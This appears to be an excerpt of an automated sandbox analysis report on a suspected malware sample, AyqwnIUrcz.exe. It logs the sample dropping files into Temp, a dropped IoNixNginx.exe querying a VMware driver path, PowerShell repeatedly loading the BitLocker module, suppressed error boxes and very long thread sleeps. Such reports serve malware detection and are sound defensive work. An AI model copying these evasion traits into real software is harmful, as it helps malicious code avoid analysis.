Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 479
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6293
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3535
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1395
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 631
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 901
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 530
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1414
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 556
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6850
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7058
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2669
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3120
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2114
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2030
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1668
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1342
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libEGL.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libGLESv2.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vulkan-1.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\nsis7z.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\System.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vulkan-1.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vk_swiftshader.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456 Thread sleep count: 6828 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1860 Thread sleep count: 479 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4116 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1988 Thread sleep count: 6293 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6792 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204 Thread sleep count: 268 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2384 Thread sleep count: 3535 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6084 Thread sleep count: 1395 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1876 Thread sleep count: 631 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340 Thread sleep time: -922337203685477s >= -30000s
